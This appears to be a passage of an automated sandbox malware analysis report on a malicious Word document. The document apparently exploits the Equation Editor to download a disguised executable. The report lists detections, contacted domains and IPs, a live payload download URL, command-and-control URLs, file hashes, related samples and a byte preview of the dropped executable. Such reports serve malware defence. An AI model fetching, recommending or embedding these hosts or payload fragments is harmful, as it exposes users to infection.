5.2.AddInProcess32.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
7.2.systray.exe.c0000.0.unpack	100%	Avira	TR/Dropper.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
neuromedic.com.br	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://neuromedic.com.br/cgi./IMG-11862.pdf	100%	Avira URL Cloud	malware
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://www.%s.com	0%	URL Reputation	safe
http://www.%s.com	0%	URL Reputation	safe
http://www.%s.com	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://www.bucklandnewton.net/bsl/?NN=GgBvVf5PQIOdcMEbYgw1IQ+nD3ax/bg71NWpn/5pwbnZwl7mOlCqEE4iezeCyF4VQz1gwg==&Epu=zv50BpeHpnjp	0%	Avira URL Cloud	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe
http://www.theprintshop.ink/bsl/?NN=iMJGa3GxI6UtmkdzIO42CvbImt4iBZLhcRTuFhGcNs1w9EATRUa5v41vQqTOTJ8d8FsBhw==&Epu=zv50BpeHpnjp	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
neuromedic.com.br	177.70.106.69	true	false	1%, Virustotal, Browse	unknown
bit.ly	67.199.248.10	true	false		high
www.theprintshop.ink	35.208.61.46	true	true		unknown
www.bucklandnewton.net	208.91.197.39	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://neuromedic.com.br/cgi./IMG-11862.pdf	true	Avira URL Cloud: malware	unknown
http://www.bucklandnewton.net/bsl/?NN=GgBvVf5PQIOdcMEbYgw1IQ+nD3ax/bg71NWpn/5pwbnZwl7mOlCqEE4iezeCyF4VQz1gwg==&Epu=zv50BpeHpnjp	true	Avira URL Cloud: safe	unknown
http://bit.ly/3oj1Gnn	false		high
http://www.theprintshop.ink/bsl/?NN=iMJGa3GxI6UtmkdzIO42CvbImt4iBZLhcRTuFhGcNs1w9EATRUa5v41vQqTOTJ8d8FsBhw==&Epu=zv50BpeHpnjp	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp	false		high
http://investor.msn.com	explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp	false		high
http://crl.entrust.net/server1.crl0	69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	false		high
http://ocsp.entrust.net03	69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pki.goog/gsr2/GTS1O1.crt0	69577.exe, 00000004.00000002.2111325978.00000000023E7000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.pki.goog/gsr202	69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp	false		high
https://pki.goog/repository/0	69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://treyresearch.net	explorer.exe, 00000006.00000000.2133467321.000000000A330000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 00000006.00000000.2133467321.000000000A330000.00000008.00000001.sdmp	false		high
http://schema.org/WebPage	69577.exe, 00000004.00000002.2111325978.00000000023E7000.00000004.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	69577.exe, 00000004.00000002.2118681264.0000000005B20000.00000002.00000001.sdmp, explorer.exe, 00000006.00000002.2356037346.0000000001C70000.00000002.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 00000006.00000000.2113821795.0000000000260000.00000004.00000020.sdmp	false		high
http://ocsp.pki.goog/gts1o1core0	69577.exe, 00000004.00000002.2111325978.00000000023E7000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://investor.msn.com/	explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp	false		high
http://www.msn.com/?ocid=iehp	explorer.exe, 00000006.00000000.2122554413.00000000042CB000.00000004.00000001.sdmp	false		high
http://crl.pki.goog/GTS1O1core.crl0	69577.exe, 00000004.00000002.2111325978.00000000023E7000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.%s.com	explorer.exe, 00000006.00000000.2133467321.000000000A330000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.piriform.com/ccleaner	explorer.exe, 00000006.00000000.2121116386.00000000039F4000.00000004.00000001.sdmp	false		high
http://www.%s.comPA	69577.exe, 00000004.00000002.2118681264.0000000005B20000.00000002.00000001.sdmp, explorer.exe, 00000006.00000002.2356037346.0000000001C70000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://%s.com	explorer.exe, 00000006.00000000.2133467321.000000000A330000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://crl.pki.goog/gsr2/gsr2.crl0?	69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.entrust.net0D	69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	69577.exe, 00000004.00000002.2111272817.00000000023C1000.00000004.00000001.sdmp	false		high
https://secure.comodo.com/CPS0	69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	false		high
http://servername/isapibackend.dll	explorer.exe, 00000006.00000000.2123702347.0000000004F30000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://crl.entrust.net/2048ca.crl0	69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
35.208.61.46	unknown	United States	19527	GOOGLE-2US	true
208.91.197.39	unknown	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
177.70.106.69	unknown	Brazil	262545	MandicSABR	false
67.199.248.10	unknown	United States	396982	GOOGLE-PRIVATE-CLOUDUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	345148
Start date:	27.01.2021
Start time:	19:08:26
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 6s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	IMG-11862.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@9/13@4/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 11% (good quality ratio 10.5%) Quality average: 75.2% Quality standard deviation: 26.4%
HCA Information:	Successful, ratio: 99% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 172.217.23.68 Excluded domains from analysis (whitelisted): www.google.com Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:08:38	API Interceptor	82x Sleep call for process: EQNEDT32.EXE modified
19:08:42	API Interceptor	77x Sleep call for process: 69577.exe modified
19:08:51	API Interceptor	88x Sleep call for process: AddInProcess32.exe modified
19:09:14	API Interceptor	160x Sleep call for process: systray.exe modified
19:09:51	API Interceptor	1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
208.91.197.39	SKM_C221200706052800.exe	Get hash	malicious	Browse	www.communityinsuranceut.com/s9zh/?aFNTkfLx=pkDVUvjZrO/wjNk8c7NHDXzL5H+kqxsq73w3/FUzwNhwu18jKLLT84svQycvaxUnudjE&O2MtVN=iJEt_VihLTLX2JB0
	o0Ka2BsNBq.exe	Get hash	malicious	Browse	www.argusproductionsus.com/8rg4/?pPX=EFQD_FT0CVqx&AdkDpFa=/EUx6Zal1ALluQYRoHhKH8fRw1WA1MBiwq5fKhvCvJ9uHm/fSkJJztyj3d1Av3XfCOX/ZJU8rg==
	PO890299700006.xlsx	Get hash	malicious	Browse	www.argusproductionsus.com/8rg4/?cF=/EUx6Zag1HLhuAUdqHhKH8fRw1WA1MBiwqhPWizDrp9vHXTZV0YFlpKh071G3WPXO4jeAw==&SBZ=epg8b
	5j6RsnL8zx.exe	Get hash	malicious	Browse	www.argusproductionsus.com/8rg4/?Txlp=/EUx6Zal1ALluQYRoHhKH8fRw1WA1MBiwq5fKhvCvJ9uHm/fSkJJztyj3eZQzGLkF7+u&OHX=JRmh
	fdxzZJ99bS.exe	Get hash	malicious	Browse	www.argusproductionsus.com/8rg4/?jP=/EUx6Zal1ALluQYRoHhKH8fRw1WA1MBiwq5fKhvCvJ9uHm/fSkJJztyj3eZQzGLkF7+u&bv4=YVM8sjIPCHML-RZP
	order FTH2004-005.exe	Get hash	malicious	Browse	www.communityinsuranceut.com/s9zh/?EPq8iH=pkDVUvjZrO/wjNk8c7NHDXzL5H+kqxsq73w3/FUzwNhwu18jKLLT84svQycvaxUnudjE&CX6pD=7n9piL3
	invoice + packing list DEC 3 by DHL.exe	Get hash	malicious	Browse	www.potrillas.com/ihm3/?U48=HvshaPc8d8ol&M2M=c2PAOBSSOZPcB6qK0/vt1cgQXXJrWGnhg4EtOZxX24gkl6t8PtECLBQ2SmYSO5LXjW1e
	w4fNtjZBEH.exe	Get hash	malicious	Browse	www.visacoincard.com/xnc/?2d=3fhlJ2NpFxSTNJL&lnPd=dKuJMJDWInUgmzajpInQduQqn4toHzINAGVDFywKs65z5Kn4pqDzcnkN6utuhmLrzG8VTPBnqw==
	enzUB9etyY.exe	Get hash	malicious	Browse	www.americastandproudagain.com/fs8/?_jqH7=hBg8OFaHu8o&ARR=9p35V3Y0QnhPJMAdx1z9xxXt1u9NKj7J5neU3YLkGviBaWhi7GibFKbSWTlziWcdTp+Q
	SOA109216.exe	Get hash	malicious	Browse	www.visacoincard.com/xnc/?MJBD=FdFp3fCHnzolbffP&qr8=dKuJMJDWInUgmzajpInQduQqn4toHzINAGVDFywKs65z5Kn4pqDzcnkN6tBt9WHT+nBD
	PI109372.exe	Get hash	malicious	Browse	www.visacoincard.com/xnc/?8pdXBn8P=dKuJMJDWInUgmzajpInQduQqn4toHzINAGVDFywKs65z5Kn4pqDzcnkN6tBt9WHT+nBD&EZUpc0=LDKXxHJhtzTle
	PI41006.exe	Get hash	malicious	Browse	www.visacoincard.com/xnc/?bl=dKuJMJDWInUgmzajpInQduQqn4toHzINAGVDFywKs65z5Kn4pqDzcnkN6tBHim3T6lJD&MJBHa=GdqXjbDP-RddJJ
	Amacon Company profile & about us.exe	Get hash	malicious	Browse	www.cancerfactsnotfears.com/aqu2/?_TAHxl=ZL3hMDhPFVz&hbWhmPd=dtxQWPdHn6NuXQ8HTzR/XDH3EART4JDZAJG4ul8zTb6sGEfCwDOpw9K3NFCkcWLNcL+tZcqKkA==
	ASQ2109942.exe	Get hash	malicious	Browse	www.visacoincard.com/xnc/?Cj=dKuJMJDWInUgmzajpInQduQqn4toHzINAGVDFywKs65z5Kn4pqDzcnkN6tBt9WHT+nBD&D8P=Br-0dH
	yeni sipari#U015f.exe	Get hash	malicious	Browse	www.americastandproudagain.com/fs8/?vh=9p35V3Y0QnhPJMAdx1z9xxXt1u9NKj7J5neU3YLkGviBaWhi7GibFKbSWTlziWcdTp+Q&CR=Cp-DpJv
	INVOICE00891.exe	Get hash	malicious	Browse	www.translationsabc.net/zaer/
	1NEW ORDER.exe	Get hash	malicious	Browse	www.archiescafe.com/uz/
	ZT0-000QuoteRequest.doc	Get hash	malicious	Browse	www.pepemaxonline.com/ch35/?sj0PBp=q7M7an3Ompw6VpChS9+NSECSax2TXCPCirXhTEf4Bwcy7Kl/GhZYhT3Nw0iVi92U0/5dTUlVC7FqDkp1HmZFUg==&0pWte=1bqdIPZ
	index[1].htm	Get hash	malicious	Browse	www.kse.com.kw/sk-logabpstatus.php?a=Sk5kbWpXTWI1S0dLTlkvMjY1LzhzRDRzdC9jVmlJNTh6RWxSMzI2NWNYdzVybUthN0JrbGpyWURBNGhaVXptT2E5Y2M1QkRxYXR1V0lrTDkwSkR5c3dvY1FxR2xndHlRK3o4b3hHVVh2N289&b=false
	16doc0828.exe	Get hash	malicious	Browse	www.livemusicismedicine.com/mm/?VXUH=fqqTsh1NtZK4sa1eF7bFPBSN72MqGmPOKOxHsBcSfg5PhWJIIvKYimeExelOsZdb/ONW&i8=-ZqDAlf8oJXdj8jP
177.70.106.69	IMG-50230.doc	Get hash	malicious	Browse	neuromedic.com.br/cgi./IMG-50230.pdf

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
bit.ly	IMG-6661.doc	Get hash	malicious	Browse	67.199.248.10
	IMG-60612.doc	Get hash	malicious	Browse	67.199.248.11
	P.O 119735.doc__.rtf	Get hash	malicious	Browse	67.199.248.11
	IMG-50230.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_155710.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_761213.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_4785.doc	Get hash	malicious	Browse	67.199.248.10
	IMG-51033.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_688031.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_68103.doc	Get hash	malicious	Browse	67.199.248.10
	DRAWING_22719.doc	Get hash	malicious	Browse	67.199.248.10
	FedEx 77258441873.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_651023.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_112237.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_75513.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_03991.doc	Get hash	malicious	Browse	67.199.248.10
	New Profit Distribution.pdf.lnk	Get hash	malicious	Browse	67.199.248.10
	CN-2nd Reminder-XXXXX1894--02072020073335073781.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_15506.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_167749.doc	Get hash	malicious	Browse	67.199.248.10
neuromedic.com.br	IMG-50230.doc	Get hash	malicious	Browse	177.70.106.69

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GOOGLE-2US	ARCHIVOFile-20-012021.doc	Get hash	malicious	Browse	35.209.96.32
	Calculation-380472272-01262021.xlsm	Get hash	malicious	Browse	35.208.103.169
	453690-3012-QZS-9120501.doc	Get hash	malicious	Browse	35.214.159.46
	MPbBCArHPF.exe	Get hash	malicious	Browse	35.208.174.213
	TBKK E12101010.xlsx	Get hash	malicious	Browse	35.208.174.213
	ARCH-SO-930373.doc	Get hash	malicious	Browse	35.209.96.32
	Info_C_780929.doc	Get hash	malicious	Browse	35.214.159.46
	Factura.doc	Get hash	malicious	Browse	35.209.114.34
	DAT 30 122020 664_16167.doc	Get hash	malicious	Browse	35.214.159.46
	Beauftragung.doc	Get hash	malicious	Browse	35.209.114.34
	sample2.doc	Get hash	malicious	Browse	35.214.199.246
	55-2912.doc	Get hash	malicious	Browse	35.209.78.196
	DAT_G_0259067.doc	Get hash	malicious	Browse	35.214.169.246
	DAT_G_0259067.doc	Get hash	malicious	Browse	35.209.78.196
	Shipping Document PL&BL Draft01.exe	Get hash	malicious	Browse	35.208.179.96
	Shipping Document PL&BL Draft.exe	Get hash	malicious	Browse	35.214.23.27
	SHEXD2101127S_ShippingDocument_DkD.xlsx	Get hash	malicious	Browse	35.208.174.213
	YUAN PAYMENT.exe	Get hash	malicious	Browse	35.208.137.4
	Invoice_20210115122010.exe	Get hash	malicious	Browse	35.208.179.96
	PO#416421.exe	Get hash	malicious	Browse	35.208.174.213
CONFLUENCE-NETWORK-INCVG	0113 INV_PAK.xlsx	Get hash	malicious	Browse	208.91.197.91
	v07PSzmSp9.exe	Get hash	malicious	Browse	208.91.197.91
	win32.exe	Get hash	malicious	Browse	204.11.56.48
	Request.xlsx	Get hash	malicious	Browse	208.91.197.91
	mitbjisfe.js	Get hash	malicious	Browse	204.11.56.48
	documents_0084568546754.exe	Get hash	malicious	Browse	208.91.197.27
	D6mimHOcsr.exe	Get hash	malicious	Browse	208.91.197.27
	KTFvWHZDMe.exe	Get hash	malicious	Browse	208.91.197.27
	PO81105083.xlsx	Get hash	malicious	Browse	208.91.197.27
	tuMCqH36OF.exe	Get hash	malicious	Browse	208.91.197.27
	2021 DOCS.xlsx	Get hash	malicious	Browse	208.91.197.27
	SecuriteInfo.com.Trojan.PackedNET.509.28611.exe	Get hash	malicious	Browse	208.91.197.27
	Details...exe	Get hash	malicious	Browse	204.11.56.48
	KuPBIsrqbO.exe	Get hash	malicious	Browse	208.91.197.91
	Fdj5vhj87S.exe	Get hash	malicious	Browse	204.11.56.48
	_MVSEASEAL_RFQ_.xlsx	Get hash	malicious	Browse	209.99.64.33
	1D1PBttduH.exe	Get hash	malicious	Browse	208.91.197.91
	Statement Of Account.exe	Get hash	malicious	Browse	204.11.56.48
	yxYmHtT7uT.exe	Get hash	malicious	Browse	204.11.56.48
	notice of arrival.xlsx	Get hash	malicious	Browse	208.91.197.91
MandicSABR	IMG-50230.doc	Get hash	malicious	Browse	177.70.106.69
	http://gruposuporte.com.br/#9053pl500@cez.cz	Get hash	malicious	Browse	177.70.106.24
	27Label_00384463.doc.js	Get hash	malicious	Browse	177.70.106.102
	27Label_00384463.doc.js	Get hash	malicious	Browse	177.70.106.102

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	IMG-60612.doc	Get hash	malicious	Browse
	P.O 119735.doc__.rtf	Get hash	malicious	Browse
	IMG-50230.doc	Get hash	malicious	Browse
	IMG_155710.doc	Get hash	malicious	Browse
	IMG_4785.doc	Get hash	malicious	Browse
	IMG_688031.doc	Get hash	malicious	Browse
	IMG_010357.doc	Get hash	malicious	Browse
	Soa.doc	Get hash	malicious	Browse
	IMG_06176.doc	Get hash	malicious	Browse
	IMG_50617.doc	Get hash	malicious	Browse
	TT Copy.doc	Get hash	malicious	Browse
	QL-0217.doc	Get hash	malicious	Browse
	RT-05723.doc	Get hash	malicious	Browse
	PIO-06711.doc	Get hash	malicious	Browse
	PO-JQ1125742021.xlsx	Get hash	malicious	Browse
	ORDER-45103.xls	Get hash	malicious	Browse
	Debt Statement.xls	Get hash	malicious	Browse
	SD-1061.xls	Get hash	malicious	Browse
	NEW ORDER.xls	Get hash	malicious	Browse
	exploit.doc	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-11862[1].pdf Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	834536
Entropy (8bit):	5.839531345051908
Encrypted:	false
SSDEEP:	12288:oJgJ5HfNbxpopPnGUw2DargRxEc3gmR4xSa6v1lnG:oJgJj/4fM/8Hwmymd5G
MD5:	5A7E3E87F007DA7D39BD5CB58CAC10D0
SHA1:	36CE7C3A2020CD79228702564F8FAE62CFEE92A1
SHA-256:	C695C80CD714ECC710510143EE54B69BDDA7FA7F01C32AE902EC3D32AF36D489
SHA-512:	BE6E53DDD02E3256A7C41C034E21AD8F469B4C95C38900AE0AA2D4A460545AD5F3B5A24E491C92663D9E1C55CEEA6B9C00EB9EADA363CE794CC84604BF027B6E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 43%
Reputation:	low
IE Cache URL:	http://neuromedic.com.br/cgi./IMG-11862.pdf
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......7.................F...J.......e... ........@.. ....................................`.................................Xe..S........F...............)........................................................... ............... ..H............text....E... ...F.................. ..`.rsrc....F.......H...H..............@..@.reloc..............................@..B.................e......H........;...)......I.................................................... .........%.....(......... 4........%.....(............0.............E............#.......<...#...@...@.......(.......+...a.5Y.aE..........+..+....+.(......X..%Z.X.],...+..+...+......E.............................&+..0..........+>..E....3...D...l...,...3...n...,........................&...+.......+...a.[Y.aE...........+..+......+.......(........+...X. ..... ..... ......[.Y2....8e.....+......8V....0..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3oj1Gnn[1].htm Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	130
Entropy (8bit):	4.749463400045454
Encrypted:	false
SSDEEP:	3:qVvzLURODccZ/vXbvx9nDyiQ1wHZYmJ3bXLMBFSXbKFvNGb:qFzLIeco3XLx92iQ1w5YmJL8SLWQb
MD5:	2CB5FE1A8E8FBD505548C2007A4154F3
SHA1:	4D13B71A0FDCA47D9B8698E59FB0C374F87911BB
SHA-256:	B66AA981A803358F40F15927D8558C9C19B5F754FD1E5D8AB496B2E5731DE628
SHA-512:	85E7918B7B40D2759F5C2847FF37DA51C88AD41B5CC7EF361724F8EC6A8FABA08C7CA712AC65A49B2EC5860FD0D7FA2E2F88DCFE1BC7B96B65B33000969B0CC0
Malicious:	false
Reputation:	low
Preview:	<html>.<head><title>Bitly</title></head>.<body><a href="http://neuromedic.com.br/cgi./IMG-11862.pdf">moved here</a></body>.</html>

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6894A6BA-6F93-4194-97B0-E6749671AC21}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9312A5BA-14BB-458B-BB2D-5B313121AE89}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	3392986
Entropy (8bit):	4.159013987555469
Encrypted:	false
SSDEEP:	49152:PGvPvR0GUvzGGGvWvpvOvGJGpxvGmGOsvGEGdsvGMGvgGvZv3qLN:eHpV0ynORm+4/+HN+FG+dJBfON
MD5:	CDFD00E64DC5034C70BBC86FBE2D6DE4
SHA1:	F28E131621CF5589ECE9D600FE567EF8E9653B4E
SHA-256:	EE88C34E545B94B40BAD81E8EB3FBD03E5940CB89F19344C41A589F9EE9BF6F1
SHA-512:	1EAD9FA82B8D71402E950EF1AFF1B45D62927C813D68C72F62D88764144742AE6BFEF51FCBC0F38C95769AE227EFB73D0D0602ADCCB5A87CFBBB2744EDF7B4DD
Malicious:	false
Reputation:	low
Preview:	..@.Q.G.6.T.Z.C.U.e.f.7.7.h.z.7.v.S.@.-.y.i.R.K.B.Y.9.a.G.n.T.X.9.P.D.q.8.<.e.h.&.&.0._.M.-.D._.g.-.-._.-.d.,.6.4.>.3.6.8.4.5.$.C.v.>.y.t.=.n.5.\|.:.%._.>.j.n.6.%.b.m.;.=.u.%.8.9...6.5..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . .

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E42C9A4D-C73B-45F3-859A-E103BFD96442}.tmp Download File
